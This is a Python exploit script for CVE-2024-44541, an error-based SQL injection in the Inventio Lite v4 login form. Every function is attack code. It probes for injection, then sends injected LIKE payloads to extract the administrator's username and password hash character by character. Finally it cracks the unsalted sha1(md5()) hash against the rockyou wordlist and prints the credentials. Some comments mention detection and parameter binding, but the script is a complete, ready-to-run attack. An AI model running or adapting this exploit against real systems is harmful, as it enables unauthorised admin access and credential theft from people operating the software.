#!/usr/bin/python3
#
# CVE-2024-44541
# Author: Andrés Del Cerro a.k.a pointedsec
# Error Based SQLi in Inventio Lite v4
# This script exploits the vulnerability, extracts the password hash from the database and tries to crack it with a wordlist.
# The passwords are hashed like this: $pass = sha1(md5($_POST['password']));
#
#
import requests
import signal
from pwn import *
BASE_URL = "http://192.168.1.51/inventio-lite/"  # hard-coded target: a private (RFC 1918) lab address, not a parameter
PWD_DIC_PATH = "/usr/share/wordlists/rockyou.txt"  # wordlist read line by line by decrypt_password()
LOGIN_ACTION = BASE_URL + "?action=processlogin"  # the login handler every request in this script is POSTed to
# Handling Ctrl + C
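def def_handler(x, y):
    """SIGINT handler: report the abort through the pwntools logger and exit with status 1.

    Args:
        x: signal number (unused).
        y: current stack frame (unused).
    """
    log.failure("Quitting...")
    # SystemExit needs no import and works without the site module, unlike the
    # ``exit()`` helper (absent under ``python -S``).
    raise SystemExit(1)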
signal.signal(signal.SIGINT, def_handler)  # Ctrl+C logs "Quitting..." and exits 1 instead of dumping a traceback
def is_vulnerable():
    """Probe the login action with an unbalanced quote pair and report whether it looks injectable.

    Returns True when the login handler answers with a non-200 status or when the
    response body carries an unhandled ``mysqli_sql_exception`` message — i.e. when
    database errors are surfaced to the client, which is what makes error-based
    detection possible at all. Anything else counts as not vulnerable. Note that a
    non-200 status alone is enough for a positive, whatever its cause.
    """
    log.info("Checking if target is vulnerable")
    probe = {"username": "\") \"", "password": "\") \""}
    response = requests.post(LOGIN_ACTION, data=probe)
    # Short-circuit keeps the body untouched when the status already decides it.
    return response.status_code != 200 or "Uncaught mysqli_sql_exception" in response.text
def get_administrator_hash(username):
    """Read the admin's stored password hash one character at a time through the login form.

    Boolean oracle: the injected ``password LIKE '<prefix>%'`` clause lets the
    login succeed (the response carries the post-login redirect snippet) only
    while the guessed prefix is right, so each character costs up to
    ``len(characters)`` POSTs to LOGIN_ACTION. A burst of login attempts with SQL
    fragments in the username field is the matching detection signal; binding
    the parameters instead of interpolating them removes the bug entirely.

    Args:
        username: admin account name as returned by get_administrator_username();
            substituted into both the ``username`` and ``email`` comparisons.

    Returns:
        The recovered hash as a string (empty if no first character matched).
    """
    prog_hash = log.progress("Extracting Admin Password Hash")
    replace_payload = "\") or username LIKE '<USER>' or email LIKE '<USER>' and password LIKE '<STR>%' and is_admin=1 LIMIT 1-- -".replace("<USER>", username)
    characters = "abcdefghijklmnopqrstuvwxyz0123456789" # SHA(MD5(PASSWORD)) so there are no symbols and no uppercases
    admin_hash = ""
    while True:
        found_char = False
        for char in characters:
            payload = {
                "username": replace_payload.replace("<STR>", admin_hash + char),
                "password": "blablablbalbablalba123@"
            }
            try:
                r = requests.post(LOGIN_ACTION, data=payload)
                r.raise_for_status()
            except requests.RequestException as e:
                # NOTE(review): pwntools' log.error() raises PwnlibException, so the
                # `continue` below is likely never reached — confirm against the
                # pwnlib version in use.
                log.error(f"Request failed: {e}")
                continue
            # Treated as the success oracle: the post-login redirect snippet in the body.
            if "<script>window.location='index.php?view=home';</script>" in r.text:
                admin_hash += char
                prog_hash.status("-> %s" % admin_hash)
                found_char = True
                break
        if not found_char:
            # No candidate extended the prefix: the whole hash has been read.
            break
    prog_hash.status("Final Admin Hash: %s" % admin_hash)
    return admin_hash
def get_administrator_username():
    """Read the admin's username (or e-mail) one character at a time through the login form.

    Same boolean oracle as get_administrator_hash(): a ``LIKE '<prefix>%'`` clause
    injected into the username field makes the login succeed exactly when the
    prefix matches, signalled by the post-login redirect snippet in the response.
    Unlike get_administrator_hash() there is no error handling here, so a failed
    POST propagates as requests.RequestException to the caller.

    Returns:
        The recovered username as a string (empty if no first character matched).
    """
    prog_username = log.progress("Extracting Username")
    replace_payload = "\") or username like '<STR>%' or email like '<STR>%' and is_admin=1 LIMIT 1-- -"
    # Wider alphabet than the hash extraction: usernames may be mixed-case e-mail addresses.
    characters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789@."
    username = ""
    while True:
        found_char = False
        for char in characters:
            payload = {
                "username": replace_payload.replace("<STR>", username + char),
                "password": "blablablablbalbla123@"
            }
            r = requests.post(LOGIN_ACTION, data=payload)
            # Treated as the success oracle: the post-login redirect snippet in the body.
            if "<script>window.location='index.php?view=home';</script>" in r.text:
                username += char
                prog_username.status("-> %s" % username)
                found_char = True
                break
        if not found_char:
            # No candidate extended the prefix: the whole username has been read.
            break
    return username
def decrypt_password(admin_hash):
    """Look the recovered hash up in the wordlist at PWD_DIC_PATH.

    The application stores ``sha1(md5(password))`` as hex digests (see the header
    comment), so every candidate is hashed the same way and compared with
    ``admin_hash``. An unsalted, fast construction like this is what makes a plain
    wordlist lookup feasible; a slow, salted password hash would not be.

    Args:
        admin_hash: hex SHA-1 digest as extracted from the database.

    Returns:
        The matching plaintext, or None (after logging an error) once the
        wordlist is exhausted.
    """
    def stored_form(candidate):
        # Mirror the server-side scheme: SHA-1 over the hex MD5 of the password.
        inner = hashlib.md5(candidate.encode()).hexdigest()
        return hashlib.sha1(inner.encode()).hexdigest()

    with open(PWD_DIC_PATH) as wordlist:
        for line in wordlist:
            candidate = line.strip()
            if stored_form(candidate) == admin_hash:
                return candidate
    log.error("Password not found in the dictionary.")
    return None
if __name__ == "__main__":
    # Check if target is vulnerable
    if not is_vulnerable():
        log.failure("Target not Vulnerable...")
        exit(1)
    log.success("Target Vulnerable!")
    log.info("Dumping Administrator username...")
    # Username first: get_administrator_hash() substitutes it into its injected clause.
    admin_username = get_administrator_username()
    admin_hash = get_administrator_hash(admin_username)
    # Offline step: no further requests, only a wordlist lookup on the hash.
    pwd = decrypt_password(admin_hash)
    # pwd is None when the wordlist had no match (decrypt_password logs an error in that case).
    log.success(f"Password Decrypted! -> {admin_username}:{pwd}")
    log.info("Try to Log In with that username, if that doesn't work, try with some uppercase/lowercase combinations")